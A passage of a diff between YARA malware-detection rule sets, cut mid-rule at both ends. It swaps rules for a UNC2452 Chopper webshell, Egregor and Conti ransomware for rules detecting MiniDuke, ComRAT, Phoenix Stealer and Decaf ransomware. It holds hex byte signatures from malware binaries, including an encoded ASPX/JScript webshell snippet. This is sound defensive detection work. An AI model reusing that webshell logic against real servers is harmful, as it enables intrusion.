78 fd ff ff 43 6f 6e 74 c7 85 7c fd ff ff 65 6e 74 2d c7 85 80 fd ff ff 44 69 73 70 c7 85 84 fd ff ff 6f 73 69 74 c7 85 88 fd ff ff 69 6f 6e 3a c7 85 8c fd ff ff 20 66 6f 72 c7 85 90 fd ff ff 6d 2d 64 61 c7 85 94 fd ff ff 74 61 3b 20 c7 85 98 fd ff ff 6e 61 6d 65 c7 85 9c fd ff ff 3d 22 65 6e c7 85 a0 fd ff ff 64 22 0d 0a 66 c7 85 a4 fd ff ff 0d 0a 8d 8d 70 fe ff ff 8d 85 72 fe ff ff 51 50 51 8d 8d 3c fa ff ff e8 b3 34 fb ff 8b d8 c6 45 fc 35 8d 8d 50 fe ff ff 8d 85 54 fe ff ff 51 50 51 8d 8d 6c fa ff ff e8 93 34 fb ff 8b f8 c6 45 fc 36 8d 8d 14 fe ff ff 8d 85 1d fe ff ff 51 50 51 8d 8d 84 fa ff ff e8 73 34 fb ff c6 45 fc 37 83 78 14 10 72 02 8b 00 50 8d 8d 1c f8 ff ff e8 bb 33 fb ff 89 85 7c fe ff ff c6 45 fc 38 8d 8d 78 fd ff ff 8d 85 a6 fd ff ff 51 50 51 8d 8d 80 f8 ff ff e8 37 34 fb ff c6 45 fc 39 83 78 14 10 72 02 8b 00 ff b5 7c fe ff ff 8b d0 8d 8d 04 f7 ff ff e8 88 4e fc ff 83 c4 04 c6 45 fc 3a 83 7f 14 10 72 02 8b 3f 57 8b d0 8d 8d 9c f8 ff ff e8 cb 60 fb ff c6 45 fc 3b 8d 4d d4 51 8b d0 8d 8d 74 f7 ff ff e8 96 b9 00 00 83 c4 08 c6 45 fc 3c 83 7b 14 10 72 02 8b 1b 53 8b d0 8d 8d b8 f8 ff ff e8 99 60 fb ff 83 c4 04 c6 45 fc 3d 6a ff 6a 00 50 8d 4d a4 e8 d5 39 fb ff c6 45 fc 3c 83 bd cc f8 ff ff 10 72 0e ff b5 b8 f8 ff ff e8 d2 c5 1f 00 83 c4 04 c7 85 cc f8 ff ff 0f 00 00 00 c7 85 c8 f8 ff ff 00 00 00 00 c6 85 b8 f8 ff ff 00 c6 45 fc 3b 83 bd 88 f7 ff ff 10 72 0e ff b5 74 f7 ff ff e8 9c c5 1f 00 83 c4 04 c7 85 88 f7 ff ff 0f 00 00 00 c7 85 84 f7 ff ff 00 00 00 00 c6 85 74 f7 ff ff 00 c6 45 fc 3a 83 bd b0 f8 ff ff 10 72 0e ff b5 9c f8 ff ff e8 66 c5 1f 00 83 c4 04 c7 85 b0 f8 ff ff 0f 00 00 00 c7 85 ac f8 ff ff 00 00 00 00 c6 85 9c f8 ff ff 00 c6 45 fc 39 83 bd 18 f7 ff ff 10 72 0e ff b5 04 f7 ff ff e8 30 c5 1f 00 83 c4 04 c7 85 18 f7 ff ff 0f 00 00 00 c7 85 14 f7 ff ff 00 00 00 00 c6 85 04 f7 ff ff 00 c6 45 fc 38 83 bd 94 f8 ff ff 10 72 0e ff b5 80 f8 ff ff e8 fa c4 1f 00 83 c4 04 c7 85 94 f8 ff ff 0f 00 00 00 c7 85 90 f8 ff ff 00 00 00 00 c6 85 80 f8 ff ff 00 c6 45 fc 37 83 bd 30 f8 ff ff 10 72 0e ff b5 1c f8 ff ff e8 c4 c4 1f 00 83 c4 04 c7 85 30 f8 ff ff 0f 00 00 00 c7 85 2c f8 ff ff 00 00 00 00 c6 85 1c f8 ff ff 00 c6 45 fc 36 83 bd 98 fa ff ff 10 72 0e ff b5 84 fa ff ff e8 8e c4 1f 00 83 c4 04 c7 85 98 fa ff ff 0f 00 00 00 c7 85 94 fa ff ff 00 00 00 00 c6 85 84 fa ff ff 00 c6 45 fc 35 83 bd 80 fa ff ff 10 72 0e ff b5 6c fa ff ff e8 58 c4 1f 00 83 c4 04 c7 85 80 fa ff ff 0f 00 00 00 c7 85 7c fa ff ff 00 00 00 00 c6 85 6c fa ff ff 00 c6 45 fc 27 83 bd 50 fa ff ff 10 72 0e ff b5 3c fa ff ff e8 22 c4 1f 00 83 c4 04 c7 85 50 fa ff ff 0f 00 00 00 c7 85 4c fa ff ff 00 00 00 00 c6 85 3c fa ff ff 00 53 19 d3 bb 18 4a 91 1c 21 c3 bb 82 54 5d 2c bb b0 08 2a 58 90 5b 51 21 e9 b9 b9 6e b4 14 31 f1 01 c1 01 f9 19 e1 21 d9 09 f9 90 59 56 be cd 3a 33 5a be 85 1b aa 6f be 1e 6c 78 2d 19 d6 21 e6 90 5e 53 31 f3 bb 8c 21 88 0d 31 db 31 eb 19 d3 19 f3 31 f3 01 f3 90 5b 80 7e 40 00 0f 85 03 06 00 00 66 c7 85 60 fe ff ff 0d 0a c7 85 48 fe ff ff 0d 0a 2d 2d c7 85 d8 fc ff ff 43 6f 6e 74 c7 85 dc fc ff ff 65 6e 74 2d c7 85 e0 fc ff ff 44 69 73 70 c7 85 e4 fc ff ff 6f 73 69 74 c7 85 e8 fc ff ff 69 6f 6e 3a c7 85 ec fc ff ff 20 66 6f 72 c7 85 f0 fc ff ff 6d 2d 64 61 c7 85 f4 fc ff ff 74 61 3b 20 c7 85 f8 fc ff ff 6e 61 6d 65 c7 85 fc fc ff ff 3d 22 63 73 c7 85 00 fd ff ff 72 66 5f 74 c7 85 04 fd ff ff 6f 6b 65 6e c7 85 08 fd ff ff 22 0d 0a 0d c6 85 0c fd ff ff 0a 8d 8d 60 fe ff ff 8d 85 62 fe ff ff 51 50 51 8d 8d 00 f9 ff ff e8 b7 30 fb ff 8b d8 c6 45 fc 3e 8d 8d 48 fe ff ff 8d 85 4c fe ff ff 51 50 51 8d 8d 30 f9 ff ff e8 97 30 } + $op1 = { 37 25 38 3d 38 43 38 5e 38 6c 38 77 38 } + $op2 = { 3f 25 3f 36 3f 66 3f 74 3f } + $op3 = { 68 66 43 78 28 6a 25 } + $op4 = { 61 46 25 7c 5f 56 21 } condition: - uint16(0)==0x5a4d and filesize >600KB and 3 of ($s*) and $seq_db and $seq_createdb and all of ($OP_Files*) + uint16(0)==0x5a4d and filesize >350KB and 2 of ($seq*) and 3 of ($op*) } -rule ARKBIRD_SOLG_APT_UNC2452_Webshell_Chopper_Mar_2021_1 : FILE +rule ARKBIRD_SOLG_APT_APT29_Miniduke_Mar_2021_1 : FILE { meta: - description = "Detect exploit listener in the exchange configuration for Webshell Chopper used by UNC2452 group" + description = "Detect MiniDuke implant used by APT29 group" author = "Arkbird_SOLG" - id = "174af8e1-0df0-5ad7-ac7d-a208f64cb765" - date = "2021-03-07" - modified = "2021-03-07" + id = "2faefc2f-afe3-51df-b530-50d3b3775071" + date = "2021-03-08" + modified = "2021-03-10" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-07/UNC2452/APT_UNC2452_Webshell_Chopper_Mar_2021_1.yar#L1-L26" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-03-09/APT29/APT_APT29_MiniDuke_Mar_2021_1.yar#L1-L20" license_url = "N/A" - logic_hash = "77bd7e5c10aa9cf2b407b37a76954b4eed163e36653e1fb3cde5de853f824cf0" - score = 75 - quality = 73 + logic_hash = "2fcbe37f9ee26a246bfc397cc907bb570a01d0f5b8e323a81aae0f6426b60435" + score = 50 + quality = 75 tags = "FILE" + hash1 = "6057b19975818ff4487ee62d5341834c53ab80a507949a52422ab37c7c46b7a1" + level = "Experimental" strings: - $l1 = { 20 68 74 74 70 3a 2f 2f ?? 2f 3c 73 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 22 63 23 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 76 6f 69 64 20 50 61 67 65 5f 4c 6f 61 64 28 6f 62 6a 65 63 74 20 73 65 6e 64 65 72 2c 20 45 76 65 6e 74 41 72 67 73 20 65 29 7b 69 66 20 28 52 65 71 75 65 73 74 2e 46 69 6c 65 73 2e 43 6f 75 6e 74 21 3d 30 29 20 7b 20 52 65 71 75 65 73 74 2e 46 69 6c 65 73 5b 30 5d 2e 53 61 76 65 41 73 28 53 65 72 76 65 72 2e 4d 61 70 50 61 74 68 28 22 [5-14] 22 29 29 3b 7d 7d 3c 2f 73 63 72 69 70 74 3e } - $l2 = { 68 74 74 70 3a 2f 2f ?? 2f 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 53 63 72 69 70 74 22 20 72 75 6e 61 74 3d 22 73 65 72 76 65 72 22 3e 66 75 6e 63 74 69 6f 6e 20 50 61 67 65 5f 4c 6f 61 64 28 29 7b 65 76 61 6c 28 [-] 2c 22 75 6e 73 61 66 65 22 29 3b 7d 3c 2f 73 63 72 69 70 74 3e } - $c1 = { 5c 4f 41 42 20 28 44 65 66 61 75 6c 74 20 57 65 62 20 53 69 74 65 29 } - $c2 = "ExternalUrl" fullword ascii - $c3 = { 49 49 53 3a 2f 2f [10-30] 2f 57 33 53 56 43 2f [1-3] 2f 52 4f 4f 54 2f 4f 41 42 } - $c4 = "FrontEnd\\HttpProxy\\OAB" fullword ascii - $c5 = "/Configuration/Schema/ms-Exch-OAB-Virtual-Directory" fullword ascii + $s1 = { 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 3b 20 62 6f 75 6e 64 61 72 79 3d 00 00 00 00 2d 2d 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 25 73 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 25 73 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 25 73 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 25 73 } + $s2 = { 70 72 6f 63 3a 20 20 25 64 20 25 73 0a 6c 6f 67 69 6e 3a 20 25 73 5c 25 73 0a 49 44 3a 20 20 20 20 30 78 25 30 38 58 0a 68 6f 73 74 3a 20 20 25 73 3a 25 64 0a 6d 65 74 68 3a 20 20 25 73 20 25 64 0a 70 69 70 65 3a 20 5c 5c 25 73 5c 70 69 70 65 5c 25 73 0a 6c 61 6e 67 3a 20 20 25 73 0a 64 65 6c 61 79 3a 20 25 64 } + $s3 = { 75 70 74 69 6d 65 20 25 35 64 2e 25 30 32 64 68 0a 00 25 73 3a 25 64 00 25 73 5c 25 73 00 3f 00 25 64 20 25 73 0a 25 73 20 25 73 20 25 73 } + $s4 = { 55 89 e5 83 ec 14 6a 02 ff 15 b8 53 44 00 e8 fd fe ff ff 8d b6 00 00 00 00 8d bc 27 00 00 00 00 55 89 e5 83 ec 14 6a 01 ff 15 } + $s5 = { 8b 85 54 64 ff ff 8b 95 44 64 ff ff 83 c2 44 89 44 24 04 89 14 24 e8 a4 e5 fc ff 83 ec 08 8b 85 44 64 ff ff 83 c0 38 c7 44 24 08 0c 00 00 00 c7 44 24 04 00 00 00 00 89 04 24 e8 8c e8 fd ff 8b 85 44 64 ff ff c7 40 38 0c 00 00 00 8b 85 44 64 ff ff c7 40 40 01 00 00 00 8b 85 44 64 ff ff c7 40 3c 00 00 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 1c 8b 85 44 64 ff ff 83 c0 18 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 2e e5 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 0f 84 09 05 00 00 8b 85 44 64 ff ff 8d 58 38 8b 85 44 64 ff ff 8d 50 24 8b 85 44 64 ff ff 83 c0 20 c7 44 24 0c 00 40 00 00 89 5c 24 08 89 54 24 04 89 04 24 e8 eb e4 fc ff 83 ec 10 85 c0 0f 95 c0 84 c0 } condition: - filesize >1KB and 1 of ($l*) and 3 of ($c*) + uint16(0)==0x5a4d and filesize >150KB and 3 of them } -rule ARKBIRD_SOLG_Ran_Egregor_Oct_2020_1 : FILE +rule ARKBIRD_SOLG_APT_Turla_Comrat_Chinch_V4_Jan_2021_1 : FILE { meta: - description = "Detect Egregor / Maze ransomware by Maze blocks" + description = "Detect ComRAT V4 (Chinch) used by APT Turla group" author = "Arkbird_SOLG" - id = "03d3ee25-cd0c-573e-beca-e4ff4377da9f" - date = "2020-10-29" - modified = "2023-11-22" + id = "7d4daf3d-eed9-59fb-a4b9-fbc1c72adfcd" + date = "2021-01-23" + modified = "2021-01-26" reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-31/Ran_Egregor_Oct_2020_1 .yar#L1-L21" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-01-23/Turla/APT_Turla_ComRAT_Chinch_V4_Jan_2021_1.yar#L1-L28" license_url = "N/A" - logic_hash = "d7d03db002b74d031b725db60e38a46abce564fb090b013aa9ec66376b430000" + logic_hash = "0d92207c4716f8d2fbf1d4f0cf3a33c38417fdd1565c87c251f7ff290135c435" score = 75 quality = 75 tags = "FILE" - hash1 = "14e547bebaa738b8605ba4182c4379317d121e268f846c0ed3da171375e65fe4" - hash2 = "af538ab1b8bdfbf5b7f1548d72c0d042eb14d0011d796cab266f0671720abb4d" - hash3 = "42ac07c5175d88d6528cfe3dceacd01834323f10c4af98b1a190d5af7a7bb1cb" - hash4 = "4139c96d16875d1c3d12c27086775437b26d3c0ebdcdc258fb012d23b9ef8345" + hash1 = "a62e1a866bc248398b6abe48fdb44f482f91d19ccd52d9447cda9bc074617d56" strings: - $x1 = { 45 f4 8b 4d 10 8b 09 0f b7 49 06 39 c8 0f 8d a2 00 00 00 8b 45 e4 83 78 10 00 75 48 8b 45 0c 8b 40 38 89 45 f0 83 7d f0 00 7e 37 31 c0 8b 4d ec 8b 55 e4 03 4a 0c 89 4d e8 8b 4d e8 8b 55 e4 89 4a 08 8b 4d f0 8b 55 e8 89 14 24 c7 44 24 04 00 00 00 00 89 4c 24 08 89 45 d4 e8 9e c6 ff ff 89 45 d0 eb 3a 8b 45 ec 8b 4d e4 03 41 0c 89 45 e8 8b 45 e4 8b 40 10 8b 4d 08 8b 55 e4 03 4a 14 8b 55 e8 89 14 24 89 4c 24 04 89 44 24 08 e8 77 a1 ff ff 8b 4d e8 8b 55 e4 89 4a 08 89 45 cc 8b 45 f4 83 c0 01 89 45 f4 8b 45 e4 83 c0 28 89 45 e4 } - $x2 = { 8b 45 f0 83 38 00 0f 86 a0 00 00 00 8b 45 f8 8b 4d f0 03 01 89 45 ec 8b 45 f0 83 c0 08 89 45 e8 c7 45 fc 00 00 00 00 8b 45 fc 8b 4d f0 8b 49 04 83 e9 08 d1 e9 39 c8 73 62 8b 45 e8 0f b7 00 c1 e8 0c 89 45 e0 8b 45 e8 0f b7 00 25 ff 0f 00 00 89 45 dc 8b 45 e0 85 c0 89 45 d0 74 0f eb 00 8b 45 d0 83 e8 03 89 45 cc 74 04 eb 17 eb 17 8b 45 ec 03 45 dc 89 45 e4 8b 45 0c 8b 4d e4 03 01 89 01 eb 02 eb 00 eb 00 8b 45 fc 83 c0 01 89 45 fc 8b 45 e8 83 c0 02 89 45 e8 eb 8c 8b 45 f0 8b 4d f0 03 41 04 89 45 f0 } - $x3 = { 8b 45 f0 8b 4d ec 03 01 89 45 e8 8b 45 e8 89 04 24 c7 44 24 04 14 00 00 00 ff 15 38 f0 0b 10 83 ec 08 31 c9 88 ca 83 f8 00 88 55 cf 75 0d 8b 45 e8 83 78 0c 00 0f 95 c1 88 4d cf 8a 45 cf a8 01 75 05 e9 6e 01 00 00 8b 45 f0 8b 4d e8 03 41 0c 89 04 24 ff 15 3c f0 0b 10 83 ec 04 89 45 dc 8b 45 dc b9 ff ff ff ff 39 c8 } - $op1 = { 60 8b 7d 08 8b 4d 10 8b 45 0c f3 aa 61 89 45 f0 } - $op2 = { 83 7d 08 00 89 45 ec 89 4d e8 89 55 e4 } - $op3 = { 89 4d e8 89 55 e4 75 09 c7 45 f0 00 00 00 00 } - $op4 = { 75 09 c7 45 f0 00 00 00 00 eb 17 60 } + $com1 = "state->_reprocess_current_token || token.type != GUMBO_TOKEN_START_TAG || token.v.start_tag.attributes.data == NULL" fullword wide + $com2 = "fragment_ctx != GUMBO_TAG_LAST" fullword wide + $com3 = "has_matching_a == 1" fullword wide + $com4 = "ODFA: %u %d %u" fullword ascii + $com5 = "Custom browser path is empty." fullword ascii + $com6 = "Default browser path is:" fullword ascii + $com7 = "Search for browser path." fullword ascii + $com8 = "Cant retrieve any path." fullword ascii + $com9 = "Custom browser path is:" fullword ascii + $jmp1 = { 2e 64 6c 6c 00 55 4d 45 50 00 56 46 45 50 } + $jmp2 = { 33 c9 e9 ?? ?? ff ff cc cc cc cc cc cc cc cc cc } + $seq1 = { 40 55 48 8d ac 24 00 fd ff ff 48 81 ec 00 04 00 00 48 8b 05 80 46 1b 00 48 33 c4 48 89 85 d0 02 00 00 b9 d8 02 00 00 e8 f4 8b 07 00 4c 8b 0d c5 a5 1c 00 48 8d 95 00 01 00 00 4c 8b 05 af a5 1c 00 48 8d 0d c8 9d 1c 00 4d 2b c8 48 89 05 ae 8a 1d 00 e8 a9 7e fc ff 48 83 bd 18 01 00 00 10 48 8d 8d 00 01 00 00 48 0f 43 8d 00 01 00 00 ff 15 24 f3 0c 00 48 8b 15 25 f3 0c 00 48 8b c8 e8 6d 59 fb ff 48 8b 95 18 01 00 00 48 83 fa 10 } + $seq2 = { 41 8b 41 08 83 e8 09 83 f8 08 } + $seq3 = { 48 8b 03 48 8b cb ff 50 08 48 8b 95 f8 01 00 00 48 83 fa 08 72 39 48 8b 8d e0 } + $seq4 = { b8 09 00 00 00 44 88 a5 60 01 00 00 48 8d 8d 60 01 00 00 f3 0f 7f 85 70 01 00 00 e8 c1 19 fc ff ba df 5e ca 76 48 8d 4d 50 e8 63 ea fc ff 48 8b c8 48 8d 95 60 01 00 00 e8 c4 cb ff ff 0f b6 15 dd 8b 1c 00 48 8b c8 e8 35 cd ff ff 48 8b 95 78 01 00 00 48 83 fa 10 72 34 } condition: - uint16(0)==0x5a4d and filesize >350KB and (3 of ($op*) or 2 of ($x*)) + uint16(0)==0x5a4d and filesize >1000KB and 6 of ($com*) and all of ($jmp*) and 3 of ($seq*) } -rule ARKBIRD_SOLG_RAN_Conti_May_2021_1 : FILE +rule ARKBIRD_SOLG_MAL_Phoenix_Stealer_Jun_2021_1 : FILE { meta: - description = "Detect packed Conti ransomware (May 2021) [Common parts with Vidar packer, possible false positives to Vidar stealer or Danabot" + description = "Detect the Phoenix Stealer" author = "Arkbird_SOLG" - id = "661182f7-4716-50d1-8d98-9fb272cf43eb" - date = "2021-05-19" - modified = "2021-05-21" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_1.yara#L1-L18" + id = "8c9df216-cbfe-51f3-a6d7-cfeb99fafbe0" + date = "2021-11-01" + modified = "2021-11-01" + reference = "https://twitter.com/3xp0rtblog/status/1455111070566207493/" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Phoenix_Stealer/MAL_Phoenix_Stealer_Jun_2021_1.yara#L1-L20" license_url = "N/A" - logic_hash = "397f99dee35d8a0c5f564655e952f8a55d347a74303eadfc6788bd6ff0f6c4c5" - score = 50 + logic_hash = "989c2518a42201559265ce4b974b35df5c4b8365e53f789fc124ee969e747c87" + score = 75 quality = 75 tags = "FILE" - hash1 = "Redacted" + hash1 = "5bbfeee67b9b087ed228eccdacd4a7e71d40f7f96ad869903e02d9c3b02adbe5" + hash2 = "34f78f4028c51f6340c1f4846b65252fa6686ba0a5ab8ebc35c737a8960ba43e" + hash3 = "e51de8c43034fafaa49f81e9cc955c0cf60dc9684f28d8c355baf0724710de1f" tlp = "White" - adversary = "RAAS" - level = "Experimental" + adversary = "-" strings: - $seq1 = { 55 8b ec [3-4] 00 00 [0-5] 56 57 83 3d [4] 25 0f 85 ?? 00 00 00 68 [2] 44 00 ff 15 [2] 42 00 3d f6 65 00 00 0f 85 ?? 00 00 00 6a 00 [0-2] ff 15 2c ?? 42 00 b9 ?? 00 00 00 be [2] 42 00 8d bd f8 f7 ff ff f3 a5 [2-4] 07 00 00 6a 00 8d 85 ?? f8 ff ff 50 e8 [4] 83 c4 0c 8d 4d f8 89 4d fc 6a 00 6a 00 [2-4] 06 00 00 } - $seq2 = { ff 15 [2] 42 00 8b ?? f4 c1 ?? 04 89 ?? e4 81 3d [4] 8c 07 00 00 75 1d 6a 00 e8 [4] 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 6a 00 ff 15 [2] 42 00 8b 45 f8 01 45 e4 8b ?? f4 03 ?? e8 89 ?? f0 81 3d [4] 96 01 } - $seq3 = { 83 bd [2] ff ff 26 75 05 e8 [2] ff ff 83 3d [4] 7a 75 75 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 33 ?? 66 89 [3] ff ff 33 ?? 89 [3] ff ff 89 [3] ff ff 89 [3] ff ff 66 89 [3] ff ff 8d [3] ff ff ?? 8d [3] ff ff ?? 8d [3] ff ff ?? ff 15 [2] 42 00 6a 00 ff 15 [2] 42 00 6a 00 6a 00 ff 15 [2] 42 00 e9 50 ff ff } - $seq4 = { 81 bd [2] ff ff 22 3b 00 00 75 [4-5] 42 00 [5-6] 81 3d [4] e5 05 00 00 75 } + $s1 = { 6a 16 58 0f be c8 88 85 b0 fe ff ff c7 85 d8 fe ff ff 42 73 7a 73 c7 85 dc fe ff ff 71 64 77 7b c7 85 e0 fe ff ff 38 73 6e 73 c6 85 e4 fe ff ff 00 e8 aa 73 ff ff 89 85 94 } + $s2 = "UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s" ascii + $s3 = { b8 c9 11 47 00 e8 c3 c5 01 00 68 f8 d7 47 00 33 db 53 53 ff 15 cc 20 47 00 53 50 89 85 d0 fc ff ff ff 15 d0 20 47 00 85 c0 0f 85 92 02 00 00 6a 01 ff 15 8c 22 47 00 84 c0 79 f4 53 e8 e2 aa 00 00 50 e8 1e 98 00 00 8b 35 84 22 47 00 8d 85 ec fe ff ff 59 59 50 53 53 6a 1c 53 ff d6 8d 8d ec fe ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 ec fe ff ff 51 50 b9 f0 5b 48 00 e8 bf 0e 00 00 8d 85 e8 fd ff ff 50 68 04 01 00 00 ff 15 40 20 47 00 8d 8d e8 fd ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e8 fd ff ff 51 50 b9 08 5c 48 00 e8 89 0e 00 00 8d 85 e4 fc ff ff 50 53 53 6a 1a 53 ff d6 8d 8d e4 fc ff ff 8d 51 01 8a 01 41 84 c0 75 f9 2b ca 8d 85 e4 fc ff ff 51 50 b9 90 5b 48 00 e8 57 0e 00 00 8b fb 89 9d dc fc ff ff 8b f3 89 bd d4 fc ff ff 89 b5 d8 fc ff ff 83 65 fc 00 33 c9 6a 16 5a 41 e8 71 05 ff ff 8b cf 89 85 e0 fc } + $s4 = { 6a 01 ff 15 98 22 47 00 85 c0 74 5d 6a 00 ff 15 a0 22 47 00 85 c0 74 51 56 6a 01 ff 15 94 22 47 00 8b f0 85 f6 74 3b 56 ff 15 38 21 47 00 8b d0 85 d2 74 27 8b ca 57 8d 79 01 8a 01 41 84 c0 75 f9 2b cf 6a 03 51 8b 0d 6c 72 48 00 52 ba 58 d7 47 00 e8 95 1b fe ff 83 c4 0c 5f 56 ff 15 64 21 47 00 } + $s5 = { 81 ec 14 02 00 00 a1 0c 50 48 00 33 c5 89 45 fc 53 56 8b d9 be 19 27 00 00 57 8b 7d 0c 83 fb ff 75 0c e8 bb eb ff ff 89 37 89 47 04 eb 17 ff 75 08 52 53 ff 15 bc 22 47 00 85 c0 8b cf 0f 95 c2 e8 b8 fe ff ff e8 98 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 75 08 81 3f 34 27 00 00 74 20 e8 80 eb ff ff 8b 4f 04 8b 49 04 3b 48 04 0f 85 b9 00 00 00 81 3f 33 27 00 00 0f 85 ad 00 00 00 83 fb ff 75 0c e8 5b eb ff ff 89 37 e9 99 00 00 00 33 c0 89 9d f8 fd ff ff 40 89 9d fc fe ff ff 89 85 f4 fd ff ff 89 85 f8 fe ff ff 8d 85 f8 fe ff ff 6a 00 50 8d 85 f4 fd ff ff 50 6a 00 8d 43 01 50 ff 15 d8 22 47 00 8b f0 8b cf 85 f6 0f 98 c2 e8 2a fe ff ff 85 f6 78 53 83 a5 f0 fd ff ff 00 8d 85 ec fd ff ff 50 8d 85 f0 fd ff ff c7 85 ec fd ff ff 04 00 00 00 50 68 07 10 00 00 68 ff ff 00 00 53 ff 15 b0 22 47 00 8b f0 8b cf 85 f6 0f 95 c2 e8 e8 fd ff } condition: - uint16(0)==0x5a4d and filesize >90KB and all of ($seq*) + uint16(0)==0x5a4d and filesize >80KB and 4 of ($s*) } -rule ARKBIRD_SOLG_RAN_Conti_May_2021_2 : FILE +rule ARKBIRD_SOLG_RAN_Decaf_Nov_2021_1 : FILE { meta: - description = "Detect unpacked Conti ransomware (May 2021)" + description = "Detect Decaf ransomware (unpacked UPX)" author = "Arkbird_SOLG" - id = "f7580a0d-b94e-560e-a01e-1f0eb0c8833e" - date = "2021-05-20" - modified = "2021-05-21" - reference = "Internal Research" - source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_2.yara#L1-L20" + id = "d19b2d31-a6c5-5033-ba43-4e9ccabc37bb" + date = "2021-11-01" + modified = "2021-11-02" + reference = "https://blog.morphisec.com/decaf-ransomware-a-new-golang-threat-makes-its-appearance" + source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-11-01/Decaf/RAN_Decaf_Nov_2021_1.yara#L1-L19" license_url = "N/A" - logic_hash = "d1ec1d2954d0075d9d9ed194bb96a34d457045bfc7a22cb44adb76dee4bc8e41" + logic_hash = "5cea33d710d252b39bcd8ae227f52d10897b7fe58b1ff5226a1cb8cc094d600c" score = 75 quality = 75 tags = "FILE" - hash1 = "Redacted" - hash2 = "a5751a46768149c5ddf318fd75afc66b3db28a5b76254ee0d6ae27b21712e266" - hash3 = "74b7a1da50ce44b640d84422bb3f99e2f338cc5d5be9ef5f1ad03c8e947296c3" - hash4 = "ef2cd9ded5532af231e0990feaf2df8fd79dc63f7a677192e17b89ef4adb7dd2" + hash1 = "088b4715bbe986deac972d551b88f178d43b191f5a71fbd4db3fb0810a233500" + hash2 = "5da2a2ebe9959e6ac21683a8950055309eb34544962c02ed564e0deaf83c9477" + tlp = "white" + adversary = "-" strings: - $seq1 = { 33 db 3c 2f 74 0a 3c 5c 74 06 3c 3a 8a c3 75 02 b0 01 2b cf 0f b6 c0 41 89 9d 68 fd ff ff f7 d8 89 9d 6c fd ff ff 56 1b c0 89 9d 70 fd ff ff 23 c1 89 9d 74 fd ff ff 89 85 88 fd ff ff 89 9d 78 fd ff ff 88 9d 7c fd ff ff e8 [4] 50 8d 85 68 fd ff ff 50 57 e8 68 fc ff ff 83 c4 0c 8d 8d ac fd ff ff f7 d8 1b c0 53 53 53 51 f7 d0 23 85 70 fd ff ff 53 50 ff 15 [4] 8b f0 83 fe ff 75 18 ff b5 a4 fd ff ff 53 53 57 e8 42 fe ff ff 83 c4 10 8b d8 e9 1c 01 00 00 8b 85 a4 fd ff ff 8b 48 04 2b 08 c1 f9 02 89 8d 84 fd ff ff 89 9d 8c fd ff ff 89 9d 90 fd ff ff 89 9d 94 fd ff ff 89 9d 98 fd ff ff 89 9d 9c fd ff ff 88 9d a0 fd ff ff e8 [4] 50 8d 85 ab fd ff ff 50 8d 85 8c fd ff ff 50 8d 85 d8 fd ff ff 50 e8 01 fb ff ff 83 c4 10 f7 d8 1b c0 f7 d0 23 85 94 fd ff ff 80 } - $seq2 = { 38 9d a0 fd ff ff 74 0c ff b5 94 fd ff ff e8 [2] ff ff 59 8d 85 ac fd ff ff 50 56 ff 15 [4] 85 c0 0f 85 4d ff ff ff 8b 85 a4 fd ff ff 8b 8d 84 fd ff ff 8b 10 8b 40 04 2b c2 c1 f8 02 3b c8 74 34 68 [4] 2b c1 6a 04 50 8d 04 8a 50 e8 [2] 00 00 83 c4 10 eb 1c 38 9d a0 fd ff ff 74 12 ff b5 94 fd ff ff e8 [2] ff ff 8b 85 80 fd ff ff 59 8b d8 56 ff 15 [4] 80 bd 7c fd ff ff 00 5e 74 0c ff b5 70 fd ff ff e8 [2] ff ff 59 8b } - $seq3 = { 6a 0c 68 [4] e8 [2] ff ff 33 f6 89 75 e4 8b 45 08 ff 30 e8 [2] ff ff 59 89 75 fc 8b 45 0c 8b 00 8b 38 8b d7 c1 fa 06 8b c7 83 e0 3f 6b c8 38 8b 04 95 [4] f6 44 08 28 01 74 21 57 e8 [2] ff ff 59 50 ff 15 [4] 85 c0 75 1d e8 [2] ff ff 8b f0 ff 15 [4] 89 06 e8 [2] ff ff c7 00 09 00 00 00 83 ce ff 89 75 e4 c7 45 fc fe ff ff ff e8 0d 00 00 00 8b c6 e8 [2] ff } - $seq4 = { 8b ff 55 